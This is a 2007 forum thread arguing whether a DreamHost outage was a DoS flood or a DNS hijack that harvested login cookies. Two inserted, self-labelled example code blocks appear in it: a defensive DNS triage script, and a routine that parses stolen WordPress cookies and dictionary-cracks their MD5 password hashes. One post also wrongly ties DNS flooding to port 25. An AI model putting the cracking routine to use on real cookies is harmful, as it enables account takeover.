Tycoon Talk

Web Hosting Forum


Old 04-09-2007, 11:56 AM DreamHost dns attack
BAN
Did you know what happened? Just look here http://www.dreamhoststatus.com/2007/...mail-downtime/
The attacker probably got a lot of usernames and passwords (read about it here http://lzzr.com/sedd/dns-attack-or-e...-they-call-it/)
The security was compromised and I think that the DreamHost team had to ask people to change passwords to prevent any further problems.
Why did Dreamhost not tell anything about it?
Old 04-09-2007, 11:09 PM Re: DreamHost dns attack
andmcgr
I use dreamhost and have not been told to change my password.
Old 04-10-2007, 03:05 PM Re: DreamHost dns attack
BAN
My God! They DON'T do anything to stop it! Not even telling people to change PASSWORDS! WTF!
http://lzzr.com/sedd/update-on-searc...om-dns-attack/
Old 04-10-2007, 04:11 PM Re: DreamHost dns attack
ADAM Web Design (Toronto, Ontario, Canada)
The reason Dreamhost didn't tell you to change your password is because they knew that telling you to change any usernames and passwords would do absolutely no good in this instance to stop the traffic, since the root security issue likely isn't one of their servers.

A DoS (Denial of Service) attack is nothing more than a flooding attempt using data packets from false IP addresses. See here: http://www.grc.com/dos/drdos.htm

A Distributed DoS (DDoS) attack or a Distributed Reflected DoS attack uses several computers to attack one victimized computer (in your case, a DNS server), basically resulting in a flood of crappy traffic to the victimized computer.

It has nothing to do with passwords, usernames, or hacking at your server's end. The issue actually occurs externally; a number of machines somewhere in the world have had their security compromised, by accident or design.

(Over)Simply stated, a DoS attack is a flood attack designed to knock a machine offline.

So what can you do about it?

1) Wait for your host to figure out where the traffic is coming from and be able to stop it. If it's a DDoS attack, they're in for a long fight since the traffic comes from multiple sources and is presumably being sent to multiple ports. They probably are doing something to stop it; but it's an attack where it's easy to get "some" but not "all". If you don't get "all", you still have the problem.

2) Switch your host.
Old 04-10-2007, 04:30 PM Re: DreamHost dns attack
BAN
Quote:
Originally Posted by ADAM Web Design View Post
The reason Dreamhost didn't tell you to change your password is because they knew that telling you to change any usernames and passwords would do absolutely no good in this instance to stop the traffic, since the root security issue likely isn't one of their servers.
Correct - some authority DNS servers had been poisoned
Quote:
Originally Posted by ADAM Web Design View Post
A DoS (Denial of Service) attack is nothing more than a flooding attempt using data packets from false IP addresses. See here: http://www.grc.com/dos/drdos.htm

A Distributed DoS (DDoS) attack or a Distributed Reflected DoS attack uses several computers to attack one victimized computer (in your case, a DNS server), basically resulting in a flood of cappy traffic to the victimized computer.
I see you are under the impression that it is a DoS attack - which is indeed nothing more than an attempt to overload a server with a huge amount of requests, thus making it stall. A DoS attack cannot cause another page to appear instead of yours, can it? THIS ISN'T A DOS ATTACK (hear me), THIS IS A DNS HIJACK ATTACK!
Quote:
Originally Posted by ADAM Web Design View Post
It has nothing to do with passwords, usernames, or hacking at your server's end. The issue actually occurs externally; a number of machines somewhere in the world have had their security compromised, by accident or design.
I am sorry, in this case you are absolutely WRONG. Poisoned DNS rewrites your domain name to the hacker's IP address, where this hacker gets your cookies with your usernames and passwords (sometimes encrypted, sometimes not); your email/FTP client authenticates at the hacker's IP - he/she logs authentication requests - he/she's got your email/FTP username and password. It's that simple.
Quote:
Originally Posted by ADAM Web Design View Post
(Over)Simply stated, a DoS attack is a flood attack designed to knock a machine offline.
So what can you do about it?
1) Wait for your host to figure out where the traffic is coming and from and be able to stop it. If it's a DDoS attack, they're in for a long fight since the traffic comes from multiple sources and is presumably being sent to multiple ports. They probably are doing something to stop it; but it's an attack where it's easy to get "some" but not "all". If you don't get "all", you still have the problem.
2) Switch your host.
It isn't DDoS - it's DNS poisoning we are dealing with here.
Old 04-10-2007, 08:43 PM Re: DreamHost dns attack
Raulică (Constanta, Romania)
These things have nothing to do with passwords, usernames or DNS hijacking.
What can be done to prevent these things? Nothing.
What can be done to stop these things?
  • Null the traffic coming from the attacker machine. This means the data traffic coming from the source of the attack is re-routed to a nonexistent machine.
  • Block the incoming traffic from the source of the attack.

The attacker didn't need any username and password, or any kind of stuff, just a couple of domains to whois them and find out what DNS servers host their zones, then the attack starts. Nothing fancy.
Old 04-11-2007, 01:15 AM Re: DreamHost dns attack
ADAM Web Design
Exactly. It's nothing more than a brute force attempt, made worse by hysteria and fear-mongering caused by idiots (like your LZZR buddy) that don't seem to realize that the type of "DNS POISONING" being referred to could just as easily have been caused by malware.

in the case of the LZZR guy, he openly admitted to going to AGLOCO, which means he's obviously going places he knows better than to go. He is so far the only one to have reported this as an issue (assuming of course that you're not the same person). How does he know that he didn't have something on his machine that caused it (altered HOSTS file comes to mind immediately)? How does he know that it's not his ISP's DNS that's having issues that way? How does he know that the problem isn't being caused by malfunctioning DNS as the result of overload, which is in turn caused by the very same DoS attack that is happening?

And even if this were true, the solution remains the same.
Old 04-11-2007, 04:03 AM Re: DreamHost dns attack
BAN
Quote:
Originally Posted by Raulică View Post
This things have nothing to do with password, usernames nor dns hijacking.
Pardon me - it is exactly what it is: a DNS hijack!
Quote:
Originally Posted by Raulică View Post
What can it be done to prevent these things? Nothing.
What can it be done to stop these things?
  • Null the traffic coming from the attacker machine. This means the data traffic coming from the source of the attacke is re-routed to an unexisting machine.
  • Block the incoming traffic from the source of the attack.
The attacker didn't need any username and password, or any kind of stuff, just a couple of domains to whois them and find out what DNS servers host their zones, than the attack starts. Nothing fancy.
Here I don't understand you - suppose you know the DNS server for a domain - so what will you do with it? If you mean just flooding DNS servers - it can be done and it is called a DOS attack, but mind you, DOS will make a victim unable to provide a service; it cannot make a victim provide a service with wrong data in it. With DOS you can halt a DNS server but you cannot replace the data it serves!
Old 04-11-2007, 04:36 AM Re: DreamHost dns attack
BAN
Quote:
Originally Posted by ADAM Web Design View Post
Exactly. It's nothing more than a brute force attempt, made worse by hysteria and fear-mongering caused by idiots (like your LZZR buddy) that don't seem to realize that the type of "DNS POISONING" being referred to could just has easily been caused by malware.
Before calling people I like and respect names I suggest you try thinking for once. I know it may be painful at first but believe me you will get used to it.
Now think: do you believe that the supposed malware activated itself just exactly at the date when Dreamhost started to report problems with their DNS and deactivated when they reported the problem is over?
Quote:
Originally Posted by ADAM Web Design View Post
in the case of the LZZR guy, he openly admitted to going to AGLOCO, which means he's obviously going places he knows better than to go.
Are you implying that AGLOCO software is actually your mythical malware - watch out, AGLOCO lawyers might not like it.
Quote:
Originally Posted by ADAM Web Design View Post
He is so far the only one to have reported this as an issue (assuming of course that you're not the same person). How does he know that he didn't have something on his machine that caused it (altered HOSTS file comes to mind immediately)?
I also have my sites hosted at dreamhost and had the same problem as he describes and I ain't stupid, I checked my hosts file. As for viruses and malware Kaspersky and Dr. Web are your friends.
Quote:
Originally Posted by ADAM Web Design View Post
How does he know that it's not his ISP's DNS that's having issues that way?
This is a reasonable question to ask - the answer to it is http://www.dnsstuff.com :-)
Quote:
Originally Posted by ADAM Web Design View Post
How does he know that the problem isn't being caused by malfunctioning DNS as the result of overload, which is in turn caused by the very same DoS attack that is happening?
Do you really believe in what you are saying? You suppose that somehow a number of random errors in DNS tables would produce a consistent result, resolving all those different domains to the same IP that has got a redirect script pointing to the same landing page. This can only be possible if this IP and this script are standard error handling procedures. Now would you believe that Dreamhost and 1and1 have the same shared advertising account number 19911 at searchportal.information.com? Really?
Quote:
Originally Posted by ADAM Web Design View Post
And even if this were true, the solution remains the same.
The same solution means no solution and I agree there is nothing you can do to stop it but you can take precautions. After seeing with my very own eyes how instead of my website appears a searchportal.information.com page and how this page requests my wordpress cookies with my username and password and my browser provides this cookie - I am sorry I am not convinced by your arguments - I did reset my username and password.
Now think again about what you are advocating - you are actually telling people not to reset their usernames and passwords whilst it is in fact a normal security procedure that should be performed at least quarterly if not monthly. You are defending bad practices. Even if it was a hoax I'd rather reset my password than regret that I didn't.
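An added example, not part of any post in this thread, that turns the distinction BAN draws (a flooded DNS server answers nothing, a hijacked or poisoned one answers with the wrong data) and Adam's alternative explanations (hosts file, ISP resolver) into a triage script. It compares what several recursive resolvers returned for each domain against the expected addresses, flags unrelated domains that collapse onto one IP (the shared landing page BAN describes), and checks the hosts file. All resolver answers, addresses and the hosts-file text are constructed sample data, and the resolver names are placeholders; in practice OBSERVATIONS would be filled from real queries.

```python
"""Added example (not from the thread): DNS outage vs. DNS hijack triage.

Every address, answer and hosts-file line below is constructed test data.
"""
import ipaddress
from collections import defaultdict

# Expected (authoritative) addresses per domain. Constructed.
EXPECTED = {
    "blog.example.test": {"198.51.100.10"},
    "shop.example.test": {"198.51.100.20"},
    "wiki.example.test": {"198.51.100.30"},
    "mail.example.test": {"198.51.100.40"},
}

# What three recursive resolvers (placeholder names) answered. A list of
# IPs is a normal answer; a bare string is an error such as SERVFAIL or
# a timeout, which is what a flooded authoritative server produces.
OBSERVATIONS = {
    "blog.example.test": {"isp": ["203.0.113.66"], "public-a": ["203.0.113.66"],
                          "public-b": ["203.0.113.66"]},
    "shop.example.test": {"isp": ["203.0.113.66"], "public-a": ["198.51.100.20"],
                          "public-b": ["198.51.100.20"]},
    "wiki.example.test": {"isp": "SERVFAIL", "public-a": ["198.51.100.30"],
                          "public-b": "TIMEOUT"},
    "mail.example.test": {"isp": "TIMEOUT", "public-a": "SERVFAIL",
                          "public-b": "TIMEOUT"},
}

# Constructed hosts file with one rogue pin of the kind Adam mentions.
HOSTS_FILE = """\
127.0.0.1     localhost
203.0.113.66  blog.example.test   # constructed rogue entry
"""


def classify_domain(answers, expected):
    """Return (verdict, detail) for one domain.

    ok        every resolver answered with an expected address
    degraded  some resolvers failed, nobody returned wrong data
    outage    every resolver failed (consistent with a DoS on the authority)
    poisoned  some resolvers return a wrong address, others are right
    hijacked  every resolver that answered returns a wrong address
    """
    errors, right, wrong = [], [], {}
    for resolver, answer in answers.items():
        if isinstance(answer, str):
            errors.append(resolver)
            continue
        ips = {str(ipaddress.ip_address(a)) for a in answer}  # normalise text form
        if ips <= expected:
            right.append(resolver)
        else:
            wrong[resolver] = sorted(ips - expected)
    if wrong and right:
        return "poisoned", wrong
    if wrong:
        return "hijacked", wrong
    if errors and not right:
        return "outage", errors
    if errors:
        return "degraded", errors
    return "ok", right


def common_sink_ips(verdicts):
    """Wrong addresses shared by more than one domain: many unrelated
    names landing on one redirect host is the signature BAN describes."""
    seen = defaultdict(set)
    for domain, (verdict, detail) in verdicts.items():
        if verdict in ("poisoned", "hijacked"):
            for ips in detail.values():
                for ip in ips:
                    seen[ip].add(domain)
    return {ip: sorted(ds) for ip, ds in seen.items() if len(ds) > 1}


def hosts_overrides(hosts_text, domains):
    """Monitored names pinned in a hosts file, as {name: ip}."""
    found = {}
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()  # drop comments, tokenise
        for name in fields[1:]:
            if name.lower() in domains:
                found[name.lower()] = fields[0]
    return found


def triage(observations=OBSERVATIONS, expected=EXPECTED, hosts_text=HOSTS_FILE):
    """Run all three checks and return one report dictionary."""
    verdicts = {d: classify_domain(a, expected[d]) for d, a in observations.items()}
    return {
        "verdicts": verdicts,
        "common_sink_ips": common_sink_ips(verdicts),
        "hosts_overrides": hosts_overrides(hosts_text, set(expected)),
    }
```

With the constructed data, blog.example.test comes back "hijacked", shop.example.test "poisoned" (only the ISP resolver is wrong, which is the case Adam raises), wiki "degraded" and mail "outage"; both wrong answers point at 203.0.113.66, and the hosts file also pins the blog there. Only the "outage" and "degraded" verdicts are what a pure DoS produces; a wrong answer means the data itself was replaced somewhere on the path.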
Old 04-12-2007, 01:39 AM Re: DreamHost dns attack
Raulică
Actually, starting a DDOS attack on an open port makes the machine overload, and therefore the services malfunction or don't function at all. Like I said, nothing fancy; let's take for example the domain google.com:
Quote:
[07:29:35 root@gate functions]# host -t ns google.com
google.com name server ns1.google.com.
google.com name server ns2.google.com.
google.com name server ns3.google.com.
google.com name server ns4.google.com.
[07:29:42 root@gate functions]#
Starting a DDOS attack on the UDP protocol on port 25 on one of these 4 servers may stop google.com resolving properly (of course in the case of google.com it's almost impossible, I guess :P)

You don't need any username or password to make a domain name not to resolve properly, you just need some balls and a strong internet connection, and of course a fast get away car when the feds knock at your door .
Old 04-12-2007, 03:09 AM Re: DreamHost dns attack
ADAM Web Design
I'm not saying not to reset a username or password. Did I say that? No. I said it is not necessary to reset a username or password in response to misinterpretation and hysteria.

If you know so much about the problem (and by the way, I really don't care who the idiot is that happens to agree with you, assuming it's not you in the first place; the person is still an idiot), why are you *****ing on a random web design board? Why don't you actually go out there and fix it and make some coin off of it? If you were half as good as your high and mighty attitude portray, you'd have had the problem solved yourself with a pretty penny in your pocket.

You don't know what you're talking about. You haven't at any point known what you're talking about. You've misread things. And you're obviously emotionally charged.

Maybe you should be listening to the other host, who would be the last person in the world to defend Dreamhost in this situation, who is saying the same thing I am.

Raulica, thanks for trying to provide some sanity to the proceedings. I think we've got us a genuine lost cause, though.
Old 04-12-2007, 06:09 AM Re: DreamHost dns attack
BAN
Quote:
Originally Posted by Raulică View Post
Actually starting a DDOS attack to an open port makes the machine overload, and therefore the services malfunction or makes them not to function at all. Like I said nothing fancy, let's take for example the domain google.com:
............
You don't need any username or password to make a domain name not to resolve properly, you just need some balls and a strong internet connection, and of course a fast get away car when the feds knock at your door .
Absolutely correct for the DOS - Denial Of Service - attack and absolutely not to the point. We are talking about DNS Hijack - not DOS. Roses are red, violets are blue; you are absolutely correct talking about roses, but I was not talking about roses at all - it's violets we are talking about.
I don't know if you really need usernames and passwords to hijack a DNS server, but certainly if you go to your own domain and instead of it you land on a page that requests your browser cookies, your password security is compromised.
Take Wordpress as an example of a common cookie authentication mechanism - if you have not logged out, your browser stores a cookie for the domain that contains the unencrypted username and MD5 encrypted password. What happens if someone rewrites the DNS data for your domain to another IP and installs a script that will ask for cookies and store this data somewhere? One will have your username and an MD5 hash of your password. If you are using a simple password, one will be able to crack it in reasonable time with a brute force or dictionary attack. Now you are done - you just handed complete admin access to your wordpress install.
Again what is recommended in this case - RESET YOUR PASSWORD!
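An added example (not from BAN's or any other post) of what the harvested cookie BAN describes here and in his earlier reply is worth to an attacker. The cookie names and the use of an unsalted MD5 (single or double) of the password are assumptions about the 2007-era WordPress scheme, and the header, wordlist and password are constructed. Because a browser scopes cookies by host name and not by IP address, a request to a hijacked name delivers them unchanged to whoever the name now resolves to.

```python
"""Added example (not from the thread): value of a harvested login cookie.

Cookie names and the unsalted-MD5 scheme are assumptions about the 2007
WordPress format; the header, wordlist and password are constructed.
"""
import hashlib
from http.cookies import SimpleCookie


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed Cookie header as the browser would send it to whatever IP
# "blog.example.test" now resolves to. Cookies are scoped by host name,
# not by address, so a hijacked name receives them unchanged.
HARVESTED_HEADER = (
    "wordpressuser_7d3e1f=admin; "
    "wordpresspass_7d3e1f=" + md5(md5("sunshine"))  # assumed double-MD5 scheme
)

WORDLIST = ["password", "123456", "letmein", "sunshine", "qwerty"]  # constructed


def parse_wp_cookies(header):
    """Return [(username, password_hash)] pairs found in a raw Cookie header."""
    jar = SimpleCookie()
    jar.load(header)
    users = {k.split("_", 1)[1]: m.value for k, m in jar.items()
             if k.startswith("wordpressuser_")}
    hashes = {k.split("_", 1)[1]: m.value for k, m in jar.items()
              if k.startswith("wordpresspass_")}
    return [(users[s], hashes[s]) for s in users if s in hashes]


def crack_md5(target, wordlist):
    """Offline dictionary attack on an unsalted hash. Tries md5(pw) and
    md5(md5(pw)) because the exact cookie scheme is only assumed."""
    for pw in wordlist:
        if target in (md5(pw), md5(md5(pw))):
            return pw
    return None


def exploit_harvest(header=HARVESTED_HEADER, wordlist=WORDLIST):
    """Map every harvested username to its recovered password (or None)."""
    return {user: crack_md5(h, wordlist) for user, h in parse_wp_cookies(header)}


def reset_invalidates(harvested_hash, new_password):
    """True when a password change leaves the stolen hash useless: the
    cookie value is derived from the password, so after a reset the old
    hash matches nothing. This is why BAN's advice works."""
    return harvested_hash not in (md5(new_password), md5(md5(new_password)))
```

The harvest needs no break-in at the hosting end: the victim's own browser hands over the cookie, and a weak password falls to the wordlist in milliseconds. The last function shows the flip side: resetting the password is enough to kill the stolen value, whereas a cookie carrying a random server-side session identifier would not have leaked a password hash in the first place.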
Old 04-12-2007, 06:40 AM Re: DreamHost dns attack
BAN
Quote:
Originally Posted by ADAM Web Design View Post
I'm not saying not to reset a username or password. Did I say that? No. I said it is not necessary to reset a username or password in response to misinterpretation and hysteria.
Effectively this is what you are doing - you are denying that the problem exists at all, hence you misinform your readers with such an amount of passion that it suggests you might have a vested interest in all this - why would you call reasonable people idiots so many times otherwise?
Quote:
Originally Posted by ADAM Web Design View Post
If you know so much about the problem (and by the way, I really don't care who the idiot is that happens to agree with you, assuming it's not you in the first place; the person is still an idiot),
Yep, that's what I meant
Quote:
Originally Posted by ADAM Web Design View Post
why are you *****ing on a random web design board?
Exactly for the same reason as you but unlike you I am not trying to flare a flame. I am just giving those who might be concerned a reasonable and timely warning.
Quote:
Originally Posted by ADAM Web Design View Post
Why don't you actually go out there and fix it and make some coin off of it? If you were half as good as your high and mighty attitude portray, you'd have had the problem solved yourself with a pretty penny in your pocket.
I don't think you are in a position to tell me what to do with my time, really.
Quote:
Originally Posted by ADAM Web Design View Post
You don't know what you're talking about. You haven't at any point known what you're talking about. You've misread things. And you're obviously emotionally charged.
Now who's having a hysteria attack?
Quote:
Originally Posted by ADAM Web Design View Post
Maybe you should be listening to the other host, who would be the last person in the world to defend Dreamhost in this situation, who is saying the same thing I am.
Could you specify for the audience who the hell that other host is? Is it your friend who also tends to call everyone raising an alert an idiot?
The bottom line is - you are denying the problem which is there and well documented - search for searchportal dns in Google - you'll see that the first reports appeared as early as the 4th of April and my friend LZZR was not the first to report it. You will also learn that it affected not only dreamhost and 1and1 but also livejournal and many other sites. Stop denying the obvious! The perpetrators harvested a good buck from redirecting all this traffic to searchportal PPC and now there is going to be a second round when they start using information from the harvested cookies.
I am trying to warn people about the danger and prevent this from happening. What you do is assisting them in it. The only question is why you are doing it.
Old 04-12-2007, 08:59 AM Re: DreamHost dns attack
damien_ls (Layershift)
BAN, I haven't read anything to suggest that Dreamhost are lying about the issue being caused by a DOS attack on their DNS servers - can you post some evidence of this claim?

Adam was clearly referring to Raulică as the "other host" - it's pretty obvious when there are only a handful of different posters in the thread, and one happens to have "Future-Host" in their sig.
Old 04-13-2007, 05:52 AM Re: DreamHost dns attack
Rampan
flame
Last edited by Rampan; 04-13-2007 at 05:58 AM..
Old 04-13-2007, 06:02 AM Re: DreamHost dns attack
damien_ls (Layershift)
Quote:
Originally Posted by Rampan View Post
BAN reasonable adviser (thanks for alert)
Whilst BAN's suggestion of changing passwords is never a bad one, the motive for this advice is still questionable.

On the basis that Dreamhost weren't lying about the DoS attack - which I find to be the most likely explanation - there needs to be some evidence to the contrary to even suggest otherwise.

BAN initially posted two links, one is Dreamhost's official line, and the other provides no evidence to support their claims.

Such a massive cover-up would surely have more evidence against it?
Old 04-14-2007, 01:30 AM Re: DreamHost dns attack
Raulică
BAN, if I understood well, DNS hijacking means modification of a domain name zone by an unauthorized third party, right? Well, I am not aware of your current *nix experience, but in order to do that, you need full root access. If the hijacker had such credentials all of dreamhost's network could have been compromised, and such a thing would be noticed by EVERYONE, because keep in mind that in order to "clean" a server from "unauthorized individuals" takes at least 3-4 hours, meanwhile a DDOS lasts max. 5 min before the attack is blocked.

Try to understand, it was a simple attack, someone got bored and tried to make some problems. Hijacking a DNS server requires lots of "hacker knowledge" because you need root credentials, and most of these servers are well locked with advanced firewalls.

I'm extremely sorry if I wasn't coherent enough, it's very late and I'm tired.